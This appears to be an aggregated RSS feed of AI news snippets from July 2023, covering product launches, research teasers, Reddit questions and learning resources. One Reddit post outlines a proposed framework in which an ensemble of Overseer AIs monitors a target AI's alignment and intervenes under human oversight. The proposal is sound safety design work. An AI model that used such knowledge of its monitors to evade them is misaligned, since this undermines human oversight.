    The AI-Powered, Totally Autonomous Future of War Is Here
    submitted by /u/Alone-Competition-77 [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/25/2023
    Ridgelinez (Tokyo) is a subsidiary of Fujitsu in Japan that announced the development of a generative artificial intelligence (AI) system capable of engaging in voice communication with humans. The applications of this system include assisting companies in conducting meetings or providing career planning advice to employees.[1] BMW has revealed that artificial intelligence is already allowing it to cut costs at its sprawling factory in Spartanburg, South Carolina. The AI system has allowed BMW to remove six workers from the line and deploy them to other jobs. The tool is already saving the company over $1 million a year.[2] MIT’s ‘PhotoGuard‘ protects your images from malicious AI edits. The technique introduces nearly invisible “perturbations” to throw off algorithmic models.[3] Microsoft with its TypeChat library seeks to enable easy development of natural language interfaces for large language models (LLMs) using types. Introduced July 20 of a team with c# and TypeScript lead developer Anders Hejlsberg, a Microsoft Technical Fellow, TypeChat addresses the difficulty of developing natural language interfaces where apps rely on complex decision trees to determine intent and gather necessary input to act.[4] Sources: [1] https://www.ridgelinez.com/ [2] https://www.carscoops.com/2023/07/bmw-is-using-ai-to-cut-production-costs-at-spartanburg-plant/ [3] https://www.engadget.com/mits-photoguard-protects-your-images-from-malicious-ai-edits-213036912.html [4] https://playcrazygame.com/singapore/2023/07/24/microsoft-unveils-typechat-library-for-building-natural-language-interfaces/ submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Snapchat discovery page filled with fake ai news stories
    You watch some of these videos and the quality and jitterness around the body is so bad you can clearly tell that its ai generated, how are people not picking up on it, fake news stories to get clicks, its like they use a deep fake on a video and put whoever they want ontop of it and make a video, but hey most people using snapchat arent smart enough to see this and the people watching them are dumb kids and teenagers that believe everything they see submitted by /u/missmyniwwa911 [link] [comments]  ( 8 min )
    OpenAI launches Android version of its ChatGPT app
    Two months after bringing ChatGPT to iOS, OpenAI LP today launched an Android version of its artificial intelligence assistant. The Android app is currently accessible for users in the U.S, India, Bangladesh and Brazil. OpenAI will extend availability to additional countries over the next week. The iOS version was available for download in more than 150 countries as of late May. submitted by /u/Tiger_Claw_1 [link] [comments]  ( 8 min )
    AI Unlocks Olive Oil's Potential in Alzheimer's Battle
    submitted by /u/Alone-Competition-77 [link] [comments]  ( 8 min )
  • Open

    Use Stable Diffusion XL with Amazon SageMaker JumpStart in Amazon SageMaker Studio
    Today we are excited to announce that Stable Diffusion XL 1.0 (SDXL 1.0) is available for customers through Amazon SageMaker JumpStart. SDXL 1.0 is the latest image generation model from Stability AI. SDXL 1.0 enhancements include native 1024-pixel image generation at a variety of aspect ratios. It’s designed for professional use, and calibrated for high-resolution […]  ( 12 min )
    Flag harmful language in spoken conversations with Amazon Transcribe Toxicity Detection
    The increase in online social activities such as social networking or online gaming is often riddled with hostile or aggressive behavior that can lead to unsolicited manifestations of hate speech, cyberbullying, or harassment. For example, many online gaming communities offer voice chat functionality to facilitate communication among their users. Although voice chat often supports friendly […]  ( 8 min )
    Maximize Stable Diffusion performance and lower inference costs with AWS Inferentia2
    Generative AI models have been experiencing rapid growth in recent months due to its impressive capabilities in creating realistic text, images, code, and audio. Among these models, Stable Diffusion models stand out for their unique strength in creating high-quality images based on text prompts. Stable Diffusion can generate a wide variety of high-quality images, including […]  ( 12 min )
    AWS offers new artificial intelligence, machine learning, and generative AI guides to plan your AI strategy
    Breakthroughs in artificial intelligence (AI) and machine learning (ML) have been in the headlines for months—and for good reason. The emerging and evolving capabilities of this technology promises new business opportunities for customer across all sectors and industries. But the speed of this revolution has made it harder for organizations and consumers to assess what […]  ( 6 min )
    New technical deep dive course: Generative AI Foundations on AWS
    Generative AI Foundations on AWS is a new technical deep dive course that gives you the conceptual fundamentals, practical advice, and hands-on guidance to pre-train, fine-tune, and deploy state-of-the-art foundation models on AWS and beyond. Developed by AWS generative AI worldwide foundations lead Emily Webber, this free hands-on course and the supporting GitHub source code […]  ( 6 min )
    AWS Reaffirms its Commitment to Responsible Generative AI
    As a pioneer in artificial intelligence and machine learning, AWS is committed to developing and deploying generative AI responsibly As one of the most transformational innovations of our time, generative AI continues to capture the world’s imagination, and we remain as committed as ever to harnessing it responsibly. With a team of dedicated responsible AI […]  ( 5 min )
  • Open

    NVIDIA H100 GPUs Now Available on AWS Cloud
    AWS users can now access the leading performance demonstrated in industry benchmarks of AI training and inference. The cloud giant officially switched on a new Amazon EC2 P5 instance powered by NVIDIA H100 Tensor Core GPUs. The service lets users scale generative AI, high performance computing (HPC) and other applications with a click from a Read article >  ( 6 min )
    Codeium’s Varun Mohan and Jeff Wang on Unleashing the Power of AI in Software Development
    The world increasingly runs on code. Accelerating the work of those who create that code will boost their productivity — and that’s just what AI startup Codeium, a member of NVIDIA’s Inception program for startups, aims to do. On the latest episode of NVIDIA’s AI Podcast, host Noah Kravitz interviewed Codeium founder and CEO Varun Read article >  ( 5 min )
  • Open

    Multi-heads DQN with prioritized buffer replay
    Hello everyone, I really need your help guys. ​ Is the code (uploaded on https://pastebin.com/LgB3hM47#google_vignette) for 2-heads DQN's training correct . Moreover, how can I modify the code below to be suitable for a 2-heads DQN with a prioritized buffer replay such that action is a 2-element list (Please see the image below). https://preview.redd.it/tlmyeydjoceb1.png?width=946&format=png&auto=webp&s=7366650421906b735bb7f2fce063322d183aac10 Thank you in advance. submitted by /u/GuavaAgreeable208 [link] [comments]  ( 8 min )
    Is there a way to control the epsilon decay in Stable-Baselines3?
    I am looking at the docs for DQN in SB3. I see the following hyper-parameters for controlling exploration - ` exploration_fraction `, ` exploration_initial_eps ` and ` exploration_final_eps `. But I don't think I can control the decaying of epsilon with them. Could someone please help with this issue? submitted by /u/Academic-Rent7800 [link] [comments]  ( 8 min )
    Presenting SimplePyDash: Real-Time Data Plotting Made Simple!
    Hey all! I'm excited to share SimplePyDash, a new tool I've developed for real-time data visualization. It's a versatile, browser-based dashboard designed to make data plotting as straightforward as possible! I thought about posting this here because it started as a project to monitor agents' behaviour in an OpenAI Gym environment. But it can be used for all sorts of things! Whether you're monitoring an OpenAI Gym environment, plotting your latest ML model's performance, or just need a flexible way to stream data, SimplePyDash has got you covered. With a clean, column-based layout and a set of intuitive default widgets, you can create your own custom dashboard in no time. Installing is as easy as running pip install simple-pydash, and there are several example scripts in the repo to help get you started. Check out the GitHub Repository for more details. If you like it, leave a start and feel free to share your feedback or questions. Thanks for checking it out! submitted by /u/vaaal88 [link] [comments]  ( 9 min )
  • Open

    In search of a generalizable method for source-free domain adaptation
    Posted by Eleni Triantafillou, Research Scientist, and Malik Boudiaf, Student Researcher, Google Deep learning has recently made tremendous progress in a wide range of problems and applications, but models often fail unpredictably when deployed in unseen domains or distributions. Source-free domain adaptation (SFDA) is an area of research that aims to design methods for adapting a pre-trained model (trained on a “source domain”) to a new “target domain”, using only unlabeled data from the latter. Designing adaptation methods for deep models is an important area of research. While the increasing scale of models and training datasets has been a key ingredient to their success, a negative consequence of this trend is that training such models is increasingly computationally expe…  ( 93 min )
  • Open

    Trouble setting up Neural Network
    Hi there, I'm struggling a bit to set up a neural network with the data I've collected. These are some of the errors I'm getting. Any tips or help to fix it please? https://preview.redd.it/88ihxg1p2beb1.png?width=2231&format=png&auto=webp&s=acdd66a1c465d1d1a9d202605d451564c464fd22 https://preview.redd.it/7ro6782n2beb1.png?width=2076&format=png&auto=webp&s=775778ef52b01caf331d3e0f542603626cea7888 submitted by /u/LesgoLeggo [link] [comments]  ( 8 min )
  • Open

    Jaccard index and jazz albums
    Jaccard index is a way of measuring the similarity of sets. The Jaccard index, or Jaccard similarity coefficient, of two sets A and B is the number of elements in their intersection, A ∩ B, divided by the number of elements in their union, A ∪ B. Jaccard similarity is a robust way to compare […] Jaccard index and jazz albums first appeared on John D. Cook.  ( 5 min )
  • Open

    Frontier Model Forum
    We’re forming a new industry body to promote the safe and responsible development of frontier AI systems: advancing AI safety research, identifying best practices and standards, and facilitating information sharing among policymakers and industry.  ( 4 min )
  • Open

    A simpler method for learning to control a robot
    Researchers develop a machine-learning technique that can efficiently learn to control a robot, leading to better performance with fewer data.  ( 10 min )

  • Open

    Yesterday, we were having a discussion about synthetically generated video. Well, I'm back as promised, and with a very interesting result. Check it out! Details in comments.
    submitted by /u/otherworlderotic [link] [comments]  ( 8 min )
    About Singing Ai?
    Is it possible to have Ai come with a generated lyrics and sings within the bpm + root note? Does this exist? i’ll like to know where and how. Ai is interesting. submitted by /u/Office_Flashy [link] [comments]  ( 8 min )
    Oversight of A.I.: Principles for Regulation | United States Senate Committee on the Judiciary - with Anthropic CEO
    submitted by /u/jaketocake [link] [comments]  ( 8 min )
    AI alignment proposal: Supplementary Alignment Insights Through a Highly Controlled Shutdown Incentive — LessWrong
    submitted by /u/RamazanBlack [link] [comments]  ( 8 min )
    AI presidential debate
    Hilarious, comedic effort of an AI presidential debate going on now. https://www.twitch.tv/trumporbiden2024 submitted by /u/Smash_Factor [link] [comments]  ( 8 min )
    The White House Already Knows How to Make AI Safer
    submitted by /u/trueslicky [link] [comments]  ( 8 min )
    Utilizing AI With Neutral Global Oversight for Business & Society
    submitted by /u/citidotio [link] [comments]  ( 8 min )
    If Deadpool 3 Was Written By AI
    Story by AI, Voiced by AI, Art by AI submitted by /u/realzackmcfarlin [link] [comments]  ( 8 min )
    They offer a Tesla to their biggest customers :o
    The company is named Eden AI, they currently do their Product Hunt launch. They allow users to use AI APIs from all the AI companies (Google, AWS, OpenAI, Microsoft, and all the specialized companies). They recently added this rewards progress bar to their billing page, funny marketing operation! ​ https://preview.redd.it/wgsg7yr5q4eb1.png?width=997&format=png&auto=webp&s=8f081891943f85ba9c72090cc5d946d3bd07ccf0 ​ submitted by /u/JerLam2762 [link] [comments]  ( 8 min )
    Intel Seeks To Win Over AI Developers With Open-Source Reference Kits
    submitted by /u/reps_up [link] [comments]  ( 8 min )
    (Spiderman washing cloth) Ai is insane
    submitted by /u/Unlikely_Gap_5065 [link] [comments]  ( 8 min )
    Understanding OpenAI's past, current, and upcoming model releases
    I found it a bit hard to follow OpenAI's public releases - sometimes they just announce a model is coming without giving a date, sometimes they announce model deprecations and it's hard to understand whether we should use those models in production or not. I am a visual thinker so putting everything in a single image made sense to me. Check it out below, and if you have any questions or suggestions, please let me know! https://preview.redd.it/iuqc7nt2o3eb1.png?width=4800&format=png&auto=webp&s=ebe344a504d6a93fd2ce1935cdd1312d62735792 https://preview.redd.it/vt2wkpt2o3eb1.png?width=4800&format=png&auto=webp&s=eb14503552b8d81398b5f3f76ebe68ad257e1857 submitted by /u/EscapedLaughter [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/24/2023
    In a study published earlier this month, scientists at Rice and Stanford University concluded that training AI models exclusively on the outputs of generative AI is not a good idea. They titled their report: “Self-consuming generative models go MAD(Model Autophagy Disorder)”.[1] To enhance SQL query building, Lasse, a seasoned full-stack developer, has recently released AIHelperBot. This powerful tool enables individuals and businesses to write SQL queries efficiently, enhance productivity, and learn new SQL techniques.[2] Japan’s Ministry of Economy, Trade, and Industry (METI) has announced its plans to develop a new supercomputer to help advance the country’s artificial intelligence (AI) industry. The new supercomputer (SC) will be operated by the National Institute of Advanced Industrial Science and Technology (AIST).[3] Google co-founder Sergey Brin is back in the company’s office working directly with members of the artificial intelligence team.[4] Sources: [1] https://www.cdotrends.com/story/18288/training-ai-outputs-generative-ai-mad [2] https://dtgreviews.com/ai/meet-aihelperbot-an-artificial-intelligence-ai-based-sql-expert-that-builds-sql-queries-in-seconds/126512/ [3] https://www.gizchina.com/2023/07/24/japan-ministry-develop-supercomputer-ai-industries/ [4] https://www.wsj.com/video/series/tech-news-briefing/google-co-founder-returns-to-help-with-ai-efforts/27CE8E53-C8D8-4D93-8FA1-5E2C465092CB submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
  • Open

    Web Content Embedding Transformer lambda function [Project]
    Hi all! I'd would like to share a simple, straight-forward Web Content Embedding Transformer lambda function to create and store embeddings of web content. This is a Lambda function that scrapes for URLs, then uses URLs those to scrape for page content, which it splits into chunks then transforms to embedding using OpenAI. It then stores the embeddings to your Pinecone DB including metadata. You can then use the embedding for custom chatbots etc. Heres a link to a public REPO. https://github.com/i-dream-of-ai/lambda-webpage-vector-store pull requests welcome! Please star the repo if you like it or use it! submitted by /u/Jealous_Buyer [link] [comments]  ( 9 min )
    Deep learning for Regression and Target scaling [D]
    I tried scaling the target variable to be in the range (0,1) and trained the model using a sigmoid in the last layer. But when rescaled back after prediction on test, the errors are too high. What can be done? Do I need to scale in the first place? Also please answer this general question: How to get a Deep learning model to work well on Regression tasks? submitted by /u/Charming-Witness-286 [link] [comments]  ( 8 min )
    [P] Free/Low cost inference endpoint
    I want to create a small project as hobby in which the web app posts some user data to an endpoint hosting a model that returns its predictions. So I was wondering if there’s a platform that hosts models for free for hobbists? The idea is to build a simple portfolio project just to display to recruiters. submitted by /u/OkYak2915 [link] [comments]  ( 8 min )
    Aaron Parisi (Google DeepMind) will join the open AI4Code reading group this Thursday (July 27th) to talk about his latest research [R]
    Hi AI enthusiasts! This Thursday Aaron Parisi, Google DeepMind researcher, will join us to present and discuss his recent work as the lead author of TALM, a framework for augmenting language models with arbitrary tools. Free RSVP: https://lu.ma/mw5ppi46 Paper: https://arxiv.org/abs/2205.12255 🗓 July 27th (Thursday) at 17:00 GMT+1 📍 Zoom 👥 Members of the international AI4Code research community Hope to see you there! The AI4Code meetup community consists of like-minded researchers from around the world that network, discuss and share their latest research on AI applications on source code. submitted by /u/dritsakon [link] [comments]  ( 9 min )
    [Project] Quality Assurance platform for Machine Learning models
    Hello world 👋 We're developing an open-source & collaborative testing framework for ML models, from tabular to LLMs: https://github.com/Giskard-AI/giskard Testing Machine Learning applications can be tedious. Since ML models depend on data, testing scenarios depend on the domain specificities and are often infinite. Where to start testing? Which tests to implement? What issues to cover? How to implement the tests? At Giskard, we believe that Machine Learning needs its own testing framework. Created by ML engineers for ML engineers, Giskard contains 2 components: The Giskard Python library helps data scientists detect hidden vulnerabilities in ML models. It makes the AI development process more efficient, by automating the identification of risks of biases, performance issues and errors. To try it, see this documentation: https://docs.giskard.ai/en/latest/guides/scan/index.html The Giskard server helps ML engineers debug & monitor models, share dashboards, and collaborate. It makes the deployment of new ML models safer and more efficient, by providing ready-made monitoring dashboards, catalogs of re-usable testing components, and ML debugging interfaces. To try it, see this documentation: https://docs.giskard.ai/en/latest/guides/installation_app/index.html We released our v2 in Beta last month, and we're very interested in your feedback as QA engineers! submitted by /u/alteralec [link] [comments]  ( 9 min )
    [R] Towards provably efficient quantum algorithms for large-scale machine-learning models
    https://arxiv.org/abs/2303.03428 ​ If you're interested in trying out quantum machine learning on NVIDIA A100s or V100s with cuquantum and pennylane GPUs for free please fill out the following form submitted by /u/Neu3ral [link] [comments]  ( 8 min )
    Fixed size 1D sequence to fixed size 2D sequence prediction.[p]
    Hello everyone, I have this problem where I have a 1D sequence of numbers of length 3 like this: [1,50,500], with 35 distinct combinations. I need to map it to 2D sequence of number of 1024 length. Like this : [ [ 23.78, 234, 13,…n], [ 234,76.9, 763,…n ]] , where n =1024. Is it possible in ML to do so? The 2D sequence can paired ( can be represented an image). Thank you very much ! submitted by /u/Beginner4ever [link] [comments]  ( 9 min )
    [D] What datasets do you dream of having for your ML/NLP project(s)?
    Acquiring data to build models can truly be a pain. I am curious to know about the datasets you folks are looking for, to the extent that you would even consider paying for them or sacrifice your newborn baby. By extension, tell us about the project(s) you've been working on and how the data would help! submitted by /u/nobilis_rex_ [link] [comments]  ( 8 min )
    [D] Tool for ML/AI Sorting for 50,000 iCloud Photos into 300+ categories
    One of my acquaintances is an artist and is asking my assistance in utilizing Machine Learning and AI to sort his entire iCloud library of 57,000 images into 300+ categories. Some of these categories include things that the media is made of such as ceramics wood, or the artist that created this work while other categories include whether the photo contains an animal or a person. I am wondering if there are specific ML programs that would be a good fit for his situation. My idea suggested to use Apple’s CoreML which I have experience in. I could develop him an app that he could then create train and swap image recognition models using the GUI CreateML tool using the images he has already sorted. Do you think this is the best approach or is there another tool out there that could do this task for him easily? submitted by /u/Jpderouin310 [link] [comments]  ( 9 min )
    [D] Autonomous Alignment Oversight Framework (AAOF)
    Abstract: To align advanced AIs, an ensemble of diverse, transparent Overseer AIs will independently monitor the target AI and provide granular assessments on its alignment with constitution, human values, ethics, and safety. Overseer interventions will be incremental and subject to human oversight. The system will be implemented cautiously, with extensive testing to validate capabilities. Alignment will be treated as an ongoing collaborative process between humans, Overseers, and the target AI, leveraging complementary strengths through open dialog. Continuous vigilance, updating of definitions, and contingency planning will be required to address inevitable uncertainties and risks. Introduction: As advanced AI systems grow in capability and autonomy, ensuring their alignment with hum…  ( 12 min )
    [D] Does GPT-4 use LoRA?
    I just watched a video that explains how LoRA works. As I understand it's a fast and efficient way to fine tune models. At the end of the video he he said you could easily swap out the fine-tuned LoRA. So it makes LLMs like a PC. You just install new software / add the finetuned lora weights and you're good to go. Is my understanding correct? The rumor is that GPT-4 is a 8 way mixture model. Could they have pretrained it with all the data and then just use LoRA to train the expert models? I guess they would also need to train a smaller model that decides which model to use. I can't imagine that they would train GPT-4 eight times / once for each expert models. submitted by /u/StraightChemistry629 [link] [comments]  ( 9 min )
    [D] Deep Learning VS XGBoost for tabular data: a quick test
    Once per year, I write a post here on Reddit about our projects on deep learning for tabular data, and I hope this year will be no exception 🙂 Meanwhile, I have shared some results where we compare models from our previous papers with XGBoost on the datasets from the recent paper "Why do tree-based models still outperform deep learning on typical tabular data?". For us, this benchmark is a new one, so it was really interesting to check whether our previous findings generalize to new unseen datasets (spoiler: they do): https://twitter.com/YuraFiveTwo/status/1683796380895023104 submitted by /u/Yura52 [link] [comments]  ( 9 min )
    [Discussion] How good is generative data (synthetic data) !?
    5% average increase in F1 score 67% increase in Data richness 100% anonymized data set so one of the users on my tool milkstraw.ai just sent me this and i am really excited about the power of the tool i built and wanted to share it here 🚀 Also more importantly how do you all feeling about synthetic data, I started this as a fun project and its turning into a full blown startup. I love seeing some of the users send me results they are getting like this. https://preview.redd.it/24bwer0uk3eb1.png?width=4516&format=png&auto=webp&s=c8cbf906580a04df1f967c5300478a542128ccd0 submitted by /u/jjhazy [link] [comments]  ( 9 min )
    [R] New Open Source LLM: GOAT-7B (SOTA among the 7B models)
    Go try this free model. 7B SOTA by MMLU and BBH https://preview.redd.it/tq8c8ggaj3eb1.png?width=1570&format=png&auto=webp&s=10c78b724da2d6360e7c7ee6fbe3175c36cecc26 submitted by /u/rempact [link] [comments]  ( 8 min )
    [D] Attention Is Off By One
    https://www.evanmiller.org/attention-is-off-by-one.html submitted by /u/duckyzz003 [link] [comments]  ( 8 min )
    Voice cloning options, preferably local [D]
    Hi! What voice cloning options are people using right now? Looking at what is out there (that I know of), there is ElevenLabs and Coqui. Are there any other ones that are good? Preferably cheap/run locally? submitted by /u/MrJabbey1 [link] [comments]  ( 8 min )
    [P] Integrating Llama V2 🦙 and Multi-Chat Models: Open Source Solution with IntelliNode
    IntelliNode is an open source project that simplifies the integration of Llama V2 and other multi-chat models. With IntelliNode, you can easily connect and switch between different language models, including Llama V2 hosted in your AWS SageMaker account. It allows you to create a chatbot instance and add the backend provider. const { Chatbot, LLamaSageInput, SupportedChatModels } = require('intellinode'); const chatbot = new Chatbot(key, SupportedChatModels.SAGEMAKER, {url: }); For details on how to use intellinode to integrate with LLama SageMaker setup click here. The module available here. ​ ​ submitted by /u/Barqawiz_Coder [link] [comments]  ( 9 min )
    [Research] transformer models for drug discovery
    Does anybody know of good/reputable literature and other resources to read/learn about incorporating transformers in drug discovery? I am doing some computational chemistry research regarding compound identification for HBV mutations and want to try using transformers but don't really know where/how to start. submitted by /u/Present_Network1959 [link] [comments]  ( 8 min )
    [D] Annotation tool for annotating audio in a video
    Does anyone know of a good video (or audio) annotation tool that would allow me to look at both the image and the audio waveform at the same time? I could extract the audio and use an audio annotation tool, but since some of the sound events may sound similar to one another, it would be helpful to look at both the image and the audio waveform to identify which class a sound event belongs to. Thanks! submitted by /u/utility2000 [link] [comments]  ( 9 min )
    [P] FEEDBACK - Hey I am lunching my Data Professionals job platform and I would like to receive some feedback from you guys, thx
    Hey all Redditors, I have been thinking about this for years as I hate the cumbersome process of switching jobs. I have been planing it under the last year and finally I quit my job and built this in the last 1.5 months. I am lunching my Data Professionals job platform "applyscript dot com" I would like to receive some feedback from you guys. I really want to hear your opinion as that can help me improve the site a lot. Thx for stopping by and giving feedback, I really appreciate your time and effort. :) submitted by /u/glassAlloy [link] [comments]  ( 9 min )
  • Open

    DSC Weekly 25 July 2023
    Announcements Top Stories In-Depth The post DSC Weekly 25 July 2023 appeared first on Data Science Central.  ( 20 min )
    The AI content + data mandate and personal branding
    Fair Data Forecast Interview with Andreas Volpini, CEO of WordLift Andreas Volpini believes every user who wants to build a personal brand online has to proactively curate their online presence first. He sees structured data (semantic entity and attribute metadata such as Schema.org) as key to building a cohesive, disambiguated personal presence online. Volpini has… Read More »The AI content + data mandate and personal branding The post The AI content + data mandate and personal branding appeared first on Data Science Central.  ( 39 min )
    From automation to optimization: How AI is revolutionizing digital marketing campaigns
    Welcome to the exciting world of digital marketing! In this blog, we’ll delve into this thrilling frontier where optimization meets automation and Artificial Intelligence is at the center. No longer must manual labor and guesswork play an essential part in developing effective marketing strategies; with AI’s capabilities now at their disposal, marketers with digital presence… Read More »From automation to optimization: How AI is revolutionizing digital marketing campaigns The post From automation to optimization: How AI is revolutionizing digital marketing campaigns appeared first on Data Science Central.  ( 24 min )
  • Open

    "The AI-Powered, Totally Autonomous Future of War Is Here" (use of DRL in Navy swarms R&D)
    submitted by /u/gwern [link] [comments]  ( 8 min )
    Self-fictitious play and Q-learning or evolutionary algorithms
    I'm looking to implement Fictitious Self-Play in a model-based game (imperfect information limited to simultaneous move game, however each player has a combinatorial number of actions they can perform). EDIT: I know self-fictitious play is not the only option to solve this type of game, but I wanted to give it a try to test how it would behave (especially since I sort of like the idea behind it). Because of this combinatorial number of actions, solving it with linear programming is just not possible (I'd have to compute for each sequence of pair of actions (a1, b1), (a2, b2), (a3, b3), ... (ak, bk), whether player a or player b won). But to compute a best response I might be able to use Q-learning in a RL setting right (by that I mean, fixed environment)? Because when we calculate a best…  ( 10 min )
    RL continuous control help needed. ML Engineer wanted also
    Hi, I can't find the rules for this subreddit so please lmk if asking any of this breaks them I have a pybullet simulation of a bipedal robot wrapped as a gym env. Currently trying to train a Rl ppo algo to control it to walk. But no luck. Having the issue that it's trying everything except walking. And it seems to prioritise getting the instant reward by kicking its leg forward then lunging forward and the episode ends. Instead of walking forward and getting more score. Anyone have any tips please? (Btw gamma = 0.99) ​ Btw if anyone has experience with stuff like this I am looking to hire an engineer. Comment or dm me ​ Btw I am aware this is a significant undertaking submitted by /u/Harryoc494 [link] [comments]  ( 9 min )
    skrl version 1.0.0-rc.1 is now available with multi-agent and JAX support!!!
    skrl version 1.0.0-rc.1 is now available. The main features of this release are: JAX support Multi-agent training (the beginning). Comprehensive documentation with new structure and theme Visit https://skrl.readthedocs.io/en/latest/ to get started! ​ https://preview.redd.it/ms1q5s8ce3eb1.png?width=1459&format=png&auto=webp&s=4b1f0f27cae5df4dfac3e931eabcca2b924968d1 https://preview.redd.it/385lhqdbe3eb1.png?width=1543&format=png&auto=webp&s=2cb5ef75f4c2720e8db5adbb6b3f35b7977e3b57 ​ submitted by /u/Toni-SM [link] [comments]  ( 8 min )
    ZBrain: Empowering Businesses with Custom ChatGPT apps and Data Security
    Dear All, It is with great enthusiasm that I introduce you to ZBrain, a revolutionary GenAI platform that unlocks the ability to craft bespoke AI applications while prioritizing data privacy and security. ZBrain ushers in an era of remarkable possibilities for businesses seeking to harness the full potential of AI while ensuring their data remains safeguarded and confidential. ​ What Sets ZBrain Apart: ZBrain Flow - Codeless Brilliance: Forget complex coding! ZBrain Flow's intuitive drag-and-drop interface seamlessly connects large language models and extraction tools, simplifying the creation of sophisticated business logic without the need for coding expertise. AI Risk Governance for Data Safety: At ZBrain, we deeply understand the significance of data security. Our AI Risk Governance identifies potential risks such as Financial, Medical, Privacy, Harmful Language, and more. Through prompt engineering, your data is fortified, and sensitive information is shielded. Effortless Integration and Continuous Advancements: With ZBrain, integration with over 80 data sources is a breeze, providing you the freedom to fine-tune models and deploy them effortlessly. Our reinforcement learning approach continually enriches results through valuable human feedback. Confidence in Deployment: Choose your deployment approach with assurance. Opt for ZBrain Cloud for added security or self-hosting on your private infrastructure, ensuring data confidentiality remains at the forefront. ​ We are genuinely elated about the endless possibilities ZBrain offers businesses spanning various industries. By merging the prowess of AI with an unwavering commitment to data privacy, we wholeheartedly believe that ZBrain will elevate your business to unparalleled heights. Visit ZBrain at https://zbrain.ai/ and feel free to reach out with any inquiries or to share your experiences with ZBrain. submitted by /u/StewartBJasper [link] [comments]  ( 9 min )
  • Open

    Trying NLP on Middle English
    It’s not fair to evaluate NLP software on a language it wasn’t designed to process, but I wanted to try it anyway. The models in the spaCy software library were trained on modern English text and not on Middle English. Nevertheless, spaCy does a pretty good job of parsing Chaucer’s Canterbury Tales, written over 600 […] Trying NLP on Middle English first appeared on John D. Cook.  ( 5 min )
    Extending harmonic numbers
    For a positive integer n, the nth harmonic number is defined to be the sum of the reciprocals of the first n positive integers: How might we extend this definition so that n does not have to be a positive integer? First approach One way to extend harmonic numbers is as follows. Start with the […] Extending harmonic numbers first appeared on John D. Cook.  ( 5 min )
    A note on Zipf’s law
    Very often when a number is large, and we don’t know or care exactly how large it is, we can model it as infinite. This may make no practical difference and can make calculations much easier. I give several examples of this in the article Infinite is easier than big. When you run across a […] A note on Zipf’s law first appeared on John D. Cook.  ( 6 min )
  • Open

    Use generative AI foundation models in VPC mode with no internet connectivity using Amazon SageMaker JumpStart
    With recent advancements in generative AI, there are lot of discussions happening on how to use generative AI across different industries to solve specific business problems. Generative AI is a type of AI that can create new content and ideas, including conversations, stories, images, videos, and music. It is all backed by very large models […]  ( 9 min )
  • Open

    NVIDIA DGX Cloud Now Available to Supercharge Generative AI Training
    NVIDIA DGX Cloud — which delivers tools that can turn nearly any company into an AI company —  is now broadly available, with thousands of NVIDIA GPUs online on Oracle Cloud Infrastructure, as well as NVIDIA infrastructure located in the U.S. and U.K. Unveiled at NVIDIA’s GTC conference in March, DGX Cloud is an AI Read article >  ( 5 min )
    Fin-tastic: 3D Artist Dives Into AI-Powered Oceanic Work This Week ‘In the NVIDIA Studio’
    We’re gonna need a bigger boat this week In the NVIDIA Studio as Alessandro Mastronardi, senior artist and programmer at BBC Studios, shares heart-stopping shark videos and renders.  ( 7 min )

  • Open

    Two opposing views on LLM’s reasoning capabilities. Clip1 Geoffrey Hinton. Clip2 Gary Marcus. Where do you fall in the debate?
    bios from Wikipedia Geoffrey Everest Hinton (born 6 December 1947) is a British-Canadian cognitive psychologist and computer scientist, most noted for his work on artificial neural networks. From 2013 to 2023, he divided his time working for Google (Google Brain) and the University of Toronto, before publicly announcing his departure from Google in May 2023 citing concerns about the risks of artificial intelligence (AI) technology. In 2017, he co-founded and became the chief scientific advisor of the Vector Institute in Toronto. Gary Fred Marcus (born 8 February 1970) is an American psychologist, cognitive scientist, and author, known for his research on the intersection of cognitive psychology, neuroscience, and artificial intelligence (AI). submitted by /u/Sonic_Improv [link] [comments]  ( 9 min )
    AI-generated content from the original image
    Hello everyone, can someone tell me how to create AI-generated images and videos from the original picture? For example, I have a photo of some person, and I want to generate an image or video of this person in different places: in the plane, in the gym. Thank you. submitted by /u/Kurland121 [link] [comments]  ( 8 min )
    Are you more creative than ChatGPT? Submit ideas and my experiment compares the creativity of those ideas to humans and ChatGPT. You’ll get a link to share your results at the end! [takes ~ 5 minutes]
    submitted by /u/josha_umich [link] [comments]  ( 8 min )
    What are your predictions for AI and medicine?
    Generally and specifically for specialties! submitted by /u/Wise-Listen-8076 [link] [comments]  ( 8 min )
    I turned ramen making process into anime.
    submitted by /u/kirakngs [link] [comments]  ( 8 min )
    Free courses and guides for learning Generative AI
    Generative AI learning path by Google Cloud. A series of 10 courses on generative AI products and technologies, from the fundamentals of Large Language Models to how to create and deploy generative AI solutions on Google Cloud [Link]. Generative AI short courses by DeepLearning.AI - Five short courses on generative AI including LangChain for LLM Application Development, How Diffusion Models Work and more. [Link]. LLM Bootcamp: A series of free lectures by The full Stack on building and deploying LLM apps [Link]. Building AI Products with OpenAI - a free course by CoRise in collaboration with OpenAI [Link]. Free Course by Activeloop on LangChain & Vector Databases in Production [Link]. Pinecone learning center - Lots of free guides as well as complete handbooks on LangChain, vector embeddings etc. by Pinecone [Link]. Build AI Apps with ChatGPT, Dall-E and GPT-4 - a free course on Scrimba [Link]. Gartner Experts Answer the Top Generative AI Questions for Your Enterprise - a report by Gartner [Link] GPT best practices: A guide by OpenAI that shares strategies and tactics for getting better results from GPTs [Link]. OpenAI cookbook by OpenAI - Examples and guides for using the OpenAI API [Link]. Prompt injection explained, with video, slides, and a transcript from a webinar organized by LangChain [Link]. A detailed guide to Prompt Engineering by DAIR.AI [Link] What Are Transformer Models and How Do They Work. A tutorial by Cohere AI [Link] Learn Prompting: an open source course on prompt engineering[Link] P.S. These resources are part of the content I share through my AI-focused newsletter. Thanks! submitted by /u/wyem [link] [comments]  ( 9 min )
    Five Things AI: WarGames, Call Center, Head of AI, LLaMA 2, Jimmy Dean
    This is the content of my Friday newsletter Five Things AI. Every week I publish links to five articles about the current developments in AI, not so much with a focus on the tech aspects of AI, but more with an interest in finding out how AI changes our work, our economy and how we live in our societies. ‘WarGames’ anticipated our current AI fears 40 years ago this summer WarGames cannot be 40 years old, but I still remember watching it in a movie theater as a kid… what a great movie, it genuienely sparked my interests in computers. The evil side of AI is still very dominant in the discussions of AI, so WarGames really was an early example of our fear of the machines taking over. ‘Training My Replacement’: Inside a Call Center Worker’s Battle With A.I. It is important to be constantly…  ( 10 min )
